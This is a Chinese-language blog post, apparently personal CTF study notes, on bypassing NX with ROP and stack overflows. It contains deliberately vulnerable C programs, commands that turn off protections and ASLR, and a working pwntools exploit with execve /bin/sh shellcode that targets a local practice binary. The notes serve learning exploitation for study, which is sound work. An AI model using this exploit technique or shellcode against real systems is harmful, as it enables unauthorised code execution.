<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=6.7.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.7.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.7.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.7.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.7.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="NX机制及绕过策略-ROP参考文章一篇文章带你清晰地理解 ROP 绕过 NX 技术NX机制及绕过策略-ROP  参考文章先做个测试1.源码文件名：StackOF.c12345678910111213141516171819#include &amp;lt;stdio.h&amp;gt;#include &amp;lt;string.h&amp;gt;void vul(char *msg) &amp;#123;   char buffer">
<meta property="og:type" content="article">
<meta property="og:title" content="NX机制及绕过策略-ROP（含无libc）">
<meta property="og:url" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="NX机制及绕过策略-ROP参考文章一篇文章带你清晰地理解 ROP 绕过 NX 技术NX机制及绕过策略-ROP  参考文章先做个测试1.源码文件名：StackOF.c12345678910111213141516171819#include &amp;lt;stdio.h&amp;gt;#include &amp;lt;string.h&amp;gt;void vul(char *msg) &amp;#123;   char buffer">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/p.webp">
<meta property="og:image" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/1.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/2.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/3.GIF">
<meta property="og:image" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/栈溢出练习1.webp">
<meta property="og:image" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/栈溢出练习.GIF">
<meta property="og:updated_time" content="2019-08-17T09:06:29.967Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="NX机制及绕过策略-ROP（含无libc）">
<meta name="twitter:description" content="NX机制及绕过策略-ROP参考文章一篇文章带你清晰地理解 ROP 绕过 NX 技术NX机制及绕过策略-ROP  参考文章先做个测试1.源码文件名：StackOF.c12345678910111213141516171819#include &amp;lt;stdio.h&amp;gt;#include &amp;lt;string.h&amp;gt;void vul(char *msg) &amp;#123;   char buffer">
<meta name="twitter:image" content="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/p.webp">






  <link rel="canonical" href="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>NX机制及绕过策略-ROP（含无libc） | Hexo</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Startseite</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>Über</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>Tags</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">

    
    
    
      
    

    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>Kategorien</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archiv</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-schedule">

    
    
    
      
    

    

    <a href="/schedule/" rel="section"><i class="menu-item-icon fa fa-fw fa-calendar"></i> <br>Schedule</a>

  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://betterlh.github.io/2019/07/23/NX机制及绕过策略-ROP/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lh">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">NX机制及绕过策略-ROP（含无libc）

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Post created: 2019-07-23 00:00:00" itemprop="dateCreated datePublished" datetime="2019-07-23T00:00:00+08:00">2019-07-23</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Updated at: 2019-08-17 17:06:29" itemprop="dateModified" datetime="2019-08-17T17:06:29+08:00">2019-08-17</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">in</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/pwn/" itemprop="url" rel="index"><span itemprop="name">pwn</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="post-meta-item-icon">
            <i class="fa fa-eye"></i>
             Views:  
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="NX机制及绕过策略-ROP"><a href="#NX机制及绕过策略-ROP" class="headerlink" title="NX机制及绕过策略-ROP"></a>NX机制及绕过策略-ROP</h1><p>参考文章<br><a href="https://xz.aliyun.com/t/3402#toc-5" target="_blank" rel="noopener">一篇文章带你清晰地理解 ROP 绕过 NX 技术</a><br><a href="https://www.jianshu.com/p/f3ebf8a360f0" target="_blank" rel="noopener">NX机制及绕过策略-ROP</a></p>
<hr>
<p><img src="/2019/07/23/NX机制及绕过策略-ROP/p.webp" alt=""><br>参考文章先做个测试<a href="https://www.jianshu.com/p/f3ebf8a360f0" target="_blank" rel="noopener"></a><br>1.源码<br>文件名：StackOF.c<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">vul</span><span class="params">(<span class="keyword">char</span> *msg)</span> </span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">   <span class="keyword">char</span> buffer[<span class="number">64</span>];</span><br><span class="line">   <span class="built_in">memcpy</span>(buffer,msg,<span class="number">128</span>);</span><br><span class="line">   <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">   <span class="built_in">puts</span>(<span class="string">"So plz give me your shellcode:"</span>);</span><br><span class="line">   <span class="keyword">char</span> buffer[<span class="number">256</span>];</span><br><span class="line">   <span class="built_in">memset</span>(buffer,<span class="number">0</span>,<span class="number">256</span>);</span><br><span class="line">   read(<span class="number">0</span>,buffer,<span class="number">256</span>);</span><br><span class="line">   vul(buffer);</span><br><span class="line">   <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>2.编译<br><img src="/2019/07/23/NX机制及绕过策略-ROP/1.GIF" alt=""><br>3.查看编译及保护<br><img src="/2019/07/23/NX机制及绕过策略-ROP/2.GIF" alt=""></p>
<p>64位文件，NX开启</p>
<p>4.查看加载的libc文件及地址<br><img src="/2019/07/23/NX机制及绕过策略-ROP/3.GIF" alt=""></p>
<h2 id="PWN-无libc泄露（XDCTF2015-pwn200）"><a href="#PWN-无libc泄露（XDCTF2015-pwn200）" class="headerlink" title="PWN-无libc泄露（XDCTF2015-pwn200）"></a>PWN-无libc泄露（XDCTF2015-pwn200）</h2><p><a href="https://blog.csdn.net/zszcr/article/details/79659071" target="_blank" rel="noopener">PWN-无libc泄露</a></p>
<p><a href="https://www.anquanke.com/post/id/85129" target="_blank" rel="noopener">技术分享】借助DynELF实现无libc的漏洞利用小结</a><br><a href="https://sunichi.github.io/2018/01/06/xdctf15-pwn200/" target="_blank" rel="noopener">xdctf 2015 pwn200 writeup</a></p>
<hr>
<h1 id="栈溢出练习"><a href="#栈溢出练习" class="headerlink" title="栈溢出练习"></a>栈溢出练习</h1><p>来自文章:   <a href="https://www.jianshu.com/p/6a1235d99176" target="_blank" rel="noopener">栈溢出练习</a><br>—- c</p>
<p>#include &lt;stdio.h&gt;</p>
<p>#include &lt;string.h&gt;<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">vul</span><span class="params">(<span class="keyword">char</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">64</span>];</span><br><span class="line">    <span class="built_in">strcpy</span>(buffer,msg);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"So plz give me your shellcode:"</span>);</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">256</span>];</span><br><span class="line">    <span class="built_in">memset</span>(buffer,<span class="number">0</span>,<span class="number">256</span>);</span><br><span class="line">    read(<span class="number">0</span>,buffer,<span class="number">256</span>);</span><br><span class="line">    vul(buffer);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>gcc编译：gcc -m32 -no-pie -fno-stack-protector -z execstack -o pwnme StackOF.c<br>最好加一条命令关闭系统的的地址随机化（需要root模式下）<br>echo 0 &gt; /proc/sys/kernel/randomize_va_space</p>
<p>查找libc文件以及libc基地址<br>命令  ldd 文件名    例如：ldd pwnme<br><img src="/2019/07/23/NX机制及绕过策略-ROP/栈溢出练习1.webp" alt=""><br>最终成功的exp<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># encoding:utf-8</span></span><br><span class="line">from pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process('./pwnme')                    #运行程序</span><br><span class="line">p.recvuntil("shellcode:")                 #当接受到字符串'shellcode:'</span><br><span class="line"></span><br><span class="line">#找jmp_esp_addr_offset</span><br><span class="line">libc = ELF('/lib/i386-linux-gnu/libc.so.6')              </span><br><span class="line">jmp_esp = asm('jmp esp')</span><br><span class="line"></span><br><span class="line">jmp_esp_addr_offset = libc.search(jmp_esp).next()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> jmp_esp_addr_offset is None:</span><br><span class="line">    print 'Cannot find jmp_esp in libc'</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    print hex(jmp_esp_addr_offset)</span><br><span class="line"></span><br><span class="line">libc_base = <span class="number">0xf7ddd000</span>          #你找到的libc加载地址，别错了我使用root找到的才成功</span><br><span class="line">jmp_esp_addr = libc_base + jmp_esp_addr_offset      #相加得到jmp_esp_addr</span><br><span class="line"></span><br><span class="line">print hex(jmp_esp_addr)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">buf = <span class="string">'A'</span>*<span class="number">76</span>                                  #如何得到填充数据大小</span><br><span class="line">buf += p32(jmp_esp_addr)</span><br><span class="line">buf += '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'</span><br><span class="line"></span><br><span class="line">with open('poc','wb') as f:</span><br><span class="line">    f.write(buf)</span><br><span class="line"></span><br><span class="line">p.sendline(buf)                                                #发送构造后的buf</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<p>如图：<br><img src="/2019/07/23/NX机制及绕过策略-ROP/栈溢出练习.GIF" alt=""></p>
<p>之前老是不成功，在比对下我发现之后查找出的基地址竟然和我之前写的基地址不一样，改动了之后还是不行。意识到地址在变化，难道是因为没有地址随机化的原因?赶紧参照文章输入命令<br><code>echo 0 &gt; /proc/sys/kernel/randomize_va_space</code><br>发现要特权模式，然后在root下再次查找发现基地址又不一样，再尝试，终于有了上图的成功！</p>
<hr>
<p>#ROP之ret2libc<br>参考文章：<br><a href="https://blog.csdn.net/qq_41725312/article/details/90748436" target="_blank" rel="noopener">ROP之ret2libc</a><br><a href="https://www.jianshu.com/p/c90530c910b0" target="_blank" rel="noopener">https://www.jianshu.com/p/c90530c910b0</a></p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/13/pwn题（jarvis）/" rel="next" title="pwn题（jarvis）">
                <i class="fa fa-chevron-left"></i> pwn题（jarvis）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/05/docker/" rel="prev" title="dockers">
                dockers <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">lh</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">83</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">10</span>
                    <span class="site-state-item-name">Kategorien</span>
                  </a>
                </div>
              

              
            </nav>
          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#NX机制及绕过策略-ROP"><span class="nav-number">1.</span> <span class="nav-text">NX机制及绕过策略-ROP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN-无libc泄露（XDCTF2015-pwn200）"><span class="nav-number">1.1.</span> <span class="nav-text">PWN-无libc泄露（XDCTF2015-pwn200）</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#栈溢出练习"><span class="nav-number">2.</span> <span class="nav-text">栈溢出练习</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lh</span>

  

  
</div>


  <div class="powered-by">Erstellt mit  <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v6.7.0</div>




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="Total Visitors">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="Total Views">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  


  <script src="/js/src/affix.js?v=6.7.0"></script>

  <script src="/js/src/schemes/pisces.js?v=6.7.0"></script>



  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  



  











  





  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
